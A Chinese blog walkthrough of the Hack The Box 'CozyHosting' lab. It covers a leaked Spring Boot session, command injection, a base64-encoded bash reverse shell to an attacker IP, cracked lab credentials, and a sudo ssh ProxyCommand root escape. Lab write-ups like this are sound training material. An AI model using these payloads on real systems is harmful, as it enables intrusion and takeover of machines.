HTB CozyHosting WP

最新推荐文章于 2024-07-12 11:59:24 发布
最新推荐文章于 2024-07-12 11:59:24 发布
阅读量152 收藏
点赞数
文章标签: web安全 linux java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60481227/article/details/134378235
版权

CozyHosting WP

Hint:目录爆破、信息泄露、RCE
难度:Easy

在这里插入图片描述

0x1 信息收集

首先利用nmap扫描一下对靶机目标进行端口探测,nmap -p- --min-rate 1000 -oN port 10.10.11.230进行扫描。
在这里插入图片描述
经典22和80开局,将扫描得到的端口进行详细的端口扫描、服务版本探测等。nmap -p 22,80,909,6146,9981,11584,15769,21390,22278,23542,40252,44667,44887,45957,56894 -sS -sV -sC -oN nmap 10.10.11.230。扫描也没有发现那些filtered端口开放。
在这里插入图片描述
直接使用IP访问web服务发现被永久重定向到了cozyhosting.htb,于是将去写入到/etc/hosts文件中去。在web站点中,只存在一个登录页面,尝试sql注入失败,于是进行目录扫描。
在这里插入图片描述
使用dirsearch进行扫描,dirsearch -u http://cozyhosting.htb/ -e php,html
在这里插入图片描述

0x2 web漏洞探测

在目录扫描中可以发现存在actuator目录,存在三个比较特殊的文件,分别是sessions,mappings和env,然后访问这些路径。其中actuator是spring boot的一个程序监视器,因此可以判断该站点使用的是该框架。
/session
在这里插入图片描述
/env
在这里插入图片描述
/mappings
在这里插入图片描述
发现sessions中泄露了已经登录用户的session信息,可以通过该session登录到kanderson。并且在mapping中发现了一个executessh路径,看似好像具有命令执行功能,但是POST的参数并没有发现。
通过bp修改请求头的JESSIONS字段的值,正常登录到admin用户界面。
在这里插入图片描述
登录后发现/admin页面中存在一个使用SSH和密钥进行添加远程主机的功能,这里填写以下hostname和username,发现返回一个ssh登录超时的报错信息。
在这里插入图片描述
通过bp的历史数据包可以发现其路由是在mappings发现的/executessh,提交的参数是host和username。通过测试发现可以在username处进行RCE。经过测试发现这个路径还没有做鉴权处理,非admin用户也可以执行命令。
在这里插入图片描述

0x3 RCE反弹shell

经过测试发现对host和username均做了过滤处理,但是在username处只是不能包含空格,可以使用%0a和%09等URL编码绕过空格过滤。于是构造payload反弹shell。
payload:
{echo,YmFzaCAtaT4mIC9kZXYvdGNwLzEwLjEwLjE0LjExMC80NDU1IDA+JjEK}|{base64,-d}|bash
将该payload进行URL编码发送,成功反弹shell。
在这里插入图片描述
并发现了web服务部署的jar包,下载下来,使用jadx-gui进行反编译,通过分析代码发现此处是调用Runtime.getRuntime().exec实现系统命令执行的。
在这里插入图片描述
并从代码中获取到postgres和kanderson用户密码:
kanderson:MRdEQuv6~6P9
postgres:Vg&nvzAQ7XxR

在这里插入图片描述
在这里插入图片描述
其中postgres也是靶机目标中的一个正常用户,是运行postgresql的用户。通过查查看/etc/passwd可以发现还存在josh普通用户。
在这里插入图片描述

0x4 postgresql登录+john爆破密码

这里使用得到密码尝试登录到postgres用户失败了,于是尝试连接数据库。发现靶机环境中存在postgresql数据库连接工具psql,尝试连接数据库。
在这里插入图片描述
使用psql -U postgres -W -h localhost连接,根据提示输入密码后连接成功。
在这里插入图片描述
使用\l查看所有的数据库,\c连接到web服务器使用的数据库cozyhosting,\d查看所有的表
在这里插入图片描述
在这里插入图片描述

通过查询得到两个用户名的密码hash值,这里我们已经知道了kanderson用户的密码,因此只要对admin账号的密码进行爆破就行了。

 kanderson $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim 
 admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

将admin的保存到文件中,使用john进行hash爆破。爆破出密码:manchesterunited
在这里插入图片描述
使用爆破得到的密码进行复用,尝试登录到普通用户josh并登录成功,得到user.txt。
在这里插入图片描述

0x5 Sudo提权root

为了得到一个更好的交互环境,使用ssh登录到josh用户上去。使用sudo -l发现ssh具有免密使用root权限运行,于是使用ssh成功得到root权限。
在这里插入图片描述
在这里插入图片描述
使用sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x成功提权到root
在这里插入图片描述

参考资料:
ssh sudo提权
PostgreSQL psql两种登录方式
PostgreSQL操作-psql基本命令

qq_60481227
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB-CozyHosting
qq_58869808的博客
09-10 1457
添加hosts文件。
htb
03-11
相关项目。
HACK THE BOX --CozyHosting
weixin_73968711的博客
12-18 657
HACK THE BOX --CozyHosting
HTB WP】Archetype
Pz_mstr's Blog
02-03 350
Hack the box - Archetype WP
htb monitorstwo wp记录
mikumiku~
05-09 543
htb monitorstwo
htb Analysis wp
mikumiku~
01-21 1179
一个简单记录
htb Surveillance wp
mikumiku~
12-12 1217
因为最近想去看live,所以一直在超市兼职打工攒钱导致没时间更新,前段时间看到夏洛克给开了就给打了,可惜漏了一个靶机,还卡住一个和一个疯狂还没打,抽时间最近会抽时间尝试一下疯狂难度的,如果有师傅需要夏洛克机器的wp过程的可以留言一下…
Htb socket wp
mikumiku~
04-01 697
hack the box socket writup
htb snoopy wp记录
mikumiku~
05-21 1213
htb snoopy wp
HTB WP】Vaccine
Pz_mstr's Blog
02-23 704
前言 Hack the box - Vaccine WP 原文用onenote写的,懒得搬运了,凑合看吧 这几天试了一下HTB,感觉挺好玩的,属于是kail熟悉练习了 小知识记录 这次用到了zip2john、john和sudo -l,记录一下 zip2john 这东西原理是啥?有源代码的,不过懒得看了,作用是提取加密压缩包哈希信息 john 提取到压缩包哈希信息后,使用 sudo john passwd.hash 进行爆破(应该是有个内置密码本) sudo -l 即sudo --list 可以列出当前用户
HTB单线策略测试
08-18
在网络安全和信息技术领域,HTB(Hierarchical Token Bucket,分层令牌桶)是一种流量整形算法,常用于网络设备如路由器和交换机中,用于管理和控制网络数据流的传输速率,确保网络服务的质量和稳定性。本话题我们将...
ROS PCQ HTB.rar
10-23
PCQ HTB(Priority Class Queue with Hierarchical Token Bucket)是ROS中的一个网络流量控制策略,它用于管理和优化机器人通信中的数据传输。在ROS系统中,HTB是一种重要的队列管理方法,用于实现带宽的精细化分配...
ros脚本HTB+PCQ
01-05
在本文中,我们将探讨“ROS脚本HTB+PCQ”这一主题,这是一种利用ROS系统的工具来实现网络流量限速的高级技术,特别适用于优化网页游戏体验和在线视频观看。 **HTB(Hierarchical Token Bucket)限速** HTBLinux...
【网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 776
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
解读网络安全公司F5:助企业高效简化多云和应用部署
hanniuniu13的博客
07-09 380
在全球迈入数字时代和深入推进产业数智化的当下,F5在全球确立了应用交付、现代应用、应用安全、分布式云四个战略业务方向后,F5一直在积极推进该项战略在中国的落地。、简化已有的网络战略的具体实践中,F5与WWT和Google Cloud合作,利用解决方案帮助客户在多云环境中管理错综复杂的应用交付和安全问题。在WWT的实施支持和Google Cloud的基础设施基础之上,再运用F5提供的安全解决方案,让企业在过渡到云环境并在云环境中扩展时,能够保持一致的安全措施和卓越的用户体验。
网络安全那些梗
最新发布
weixin_73442302的博客
07-12 655
例如,“网络购物”本可以直接称为“购物”,“网络安全”则强调了安全概念在网络环境中的应用。:在注册网站时,网络安全界的人有时会采用“真电话+假名字”的方式填写个人信息,以应对可能的骚扰电话。一些笑话中,网络安全从业人员被误解为黑客,被亲戚朋友请求帮忙破解WiFi密码、盗取QQ号等,这实际上是对网络安全工程师工作的误解。:这个梗源自一个笑话,讲述了一位程序员因误解妻子的话而只买了一个包子回家,随后被领导提醒要进行安全检查扫描,程序员戏称“让网络彻底安全的最有效方法竟然是关掉服务器”。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1187
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络设备安全
weixin_48579910的博客
07-11 833
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
cozyhosting+htb
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值